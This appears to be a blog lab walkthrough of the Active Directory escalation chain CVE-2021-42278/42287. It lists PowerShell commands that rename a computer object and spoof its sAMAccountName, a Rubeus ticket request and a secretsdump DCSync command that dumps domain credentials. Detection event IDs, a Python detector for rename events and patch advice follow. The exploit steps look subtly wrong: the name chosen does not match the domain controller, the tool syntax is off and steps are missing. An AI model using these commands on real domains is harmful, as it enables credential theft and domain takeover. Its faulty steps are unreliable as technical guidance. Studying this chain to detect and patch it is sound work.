Table of Contents
- Introduction
- Why is this Attack Important?
- Vulnerability Overview
- Lab Setup (Tools + Env)
- Step-by-Step Exploitation
- Detection & Blue Team View
- Patch & Mitigation Tips
- References + Final Thoughts
CVE-2021-42278 && CVE-2021-42287: From User to Domain Admin - Simulating
In the world of advanced cyber attacks on Active Directory, several vulnerabilities continue to affect systems even after updates. One such critical vulnerability duo, discovered in late 2021, was CVE-2021-42278 and CVE-2021-42287, which together allow escalation from a low-privileged user to Domain Admin using simple tools.
Why is this attack important?
This attack is unique for several reasons:
- No misconfigurations required: Relies solely on Active Directory vulnerabilities
- Simplicity of exploitation: Easy escalation to Domain Admin with minimal effort
In this post, we’ll simulate this attack in a lab environment using these CVEs on unpatched systems.
Vulnerability Overview
📌 CVE-2021-42278: SAMAccountName Spoofing
Allows spoofing computer account names to appear as user accounts. Attackers can create fake computer objects with user-like sAMAccountName values.
📌 CVE-2021-42287: Kerberos Privilege Escalation
Enables privilege escalation through Kerberos TGT manipulation, allowing Domain Controller impersonation and DCSync attacks.
Lab Setup (Tools + Env)
| Component | Description |
|---|---|
| OS | Windows Server 2019 (unpatched, pre-Nov 2021) |
| Tools | Mimikatz, Rubeus, Impacket, KrbRelayUp |
| User Account | Low-privileged user (amr.user@corp.local) |
| Domain Controller | Unpatched (pre-Nov 2021 patches) |
Step-by-Step Exploitation
Step 1: Login as a regular user
Assume compromised credentials for the low-privileged user amr.user@corp.local.
Step 2: Rename Computer Object to User-Like Name
```powershell
Rename-ADObject "CN=WIN10-CLIENT,CN=Computers,DC=corp,DC=local" -NewName "amruser"
```
Step 3: Modify sAMAccountName
```powershell
Set-ADComputer -Identity "amruser" -SamAccountName "amruser"
```
Step 4: Request TGT for Spoofed Computer
```
rubeus tgtdeleg /user:amruser$ /rc4:<ntlm_hash> /domain:corp.local
```
Step 5: Impersonate Domain Controller & DCSync
```
secretsdump.py -k -no-pass CORP/amruser$@dc.corp.local
```
Step 6: Profit – Domain Admin Access
Use dumped credentials to access privileged accounts.
Detection & Blue Team View
Key Detection Points:
- 🔍 Event ID 4741: Computer account creation
- 🔍 Event ID 4781: SAMAccountName changes
- 🔍 Kerberos TGT Anomalies
- 🔍 Unusual DC impersonation attempts
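A minimal detector for the Event ID 4781 point above, written as an added example rather than code from the original post: it flags account renames that drop the trailing `$` of a computer account, the sAMAccountName change at the core of CVE-2021-42278. The records are constructed in the exported-EVTX XML shape of 4781 (OldTargetUserName / NewTargetUserName / SubjectUserName fields); dc.corp.local and the subject names are assumptions.

```python
"""Flag 4781 renames where a computer account (name ending in '$') becomes a
user-like name. Added example; sample events below are constructed, not captured."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def make_4781(old, new, subject):
    """Build a constructed 4781 record in exported-EVTX XML form (demo data only)."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4781</EventID>'
            f'<Computer>dc.corp.local</Computer></System><EventData>'
            f'<Data Name="OldTargetUserName">{old}</Data>'
            f'<Data Name="NewTargetUserName">{new}</Data>'
            f'<Data Name="TargetDomainName">CORP</Data>'
            f'<Data Name="SubjectUserName">{subject}</Data></EventData></Event>')


SAMPLE_EVENTS = [
    make_4781("WIN10-CLIENT$", "amruser", "amr.user"),   # computer -> user-like name
    make_4781("jdoe", "john.doe", "Administrator"),      # ordinary user rename, benign
    make_4781("LAPTOP07$", "LAPTOP-07$", "svc_deploy"),  # computer rename that keeps '$'
]


def parse_event(xml_text):
    """Return {'event_id': int, 'computer': str, <Data Name>: value, ...} for one record."""
    root = ET.fromstring(xml_text)
    rec = {
        "event_id": int(root.findtext("e:System/e:EventID", namespaces=NS)),
        "computer": root.findtext("e:System/e:Computer", namespaces=NS),
    }
    for data in root.findall("e:EventData/e:Data", NS):
        rec[data.get("Name")] = data.text or ""
    return rec


def is_suspicious_rename(rec):
    """True when a 4781 rename removes the '$' suffix that marks a computer account."""
    if rec.get("event_id") != 4781:
        return False
    old, new = rec.get("OldTargetUserName", ""), rec.get("NewTargetUserName", "")
    return old.endswith("$") and not new.endswith("$")


def find_spoofing_candidates(events_xml):
    """Parse each record and return (subject, old_name, new_name) for suspect renames."""
    hits = []
    for xml_text in events_xml:
        rec = parse_event(xml_text)
        if is_suspicious_rename(rec):
            hits.append((rec["SubjectUserName"], rec["OldTargetUserName"], rec["NewTargetUserName"]))
    return hits


if __name__ == "__main__":
    for subject, old, new in find_spoofing_candidates(SAMPLE_EVENTS):
        print(f"ALERT on dc.corp.local: {subject} renamed computer account {old} -> {new}")
```

In production the same check would run over `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4781}` output exported as XML; a hit from a non-administrative subject is the signal worth paging on.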
Patch & Mitigation Tips
- ✅ Apply November 2021 Security Updates
- ✅ Restrict Computer Object Modifications
- ✅ Monitor SAMAccountName Changes
- ✅ Implement Least Privilege Access
References + Final Thoughts
This attack chain demonstrates how inherent Active Directory vulnerabilities can enable full domain compromise without misconfigurations. Regular patching and strict monitoring are essential for AD security.
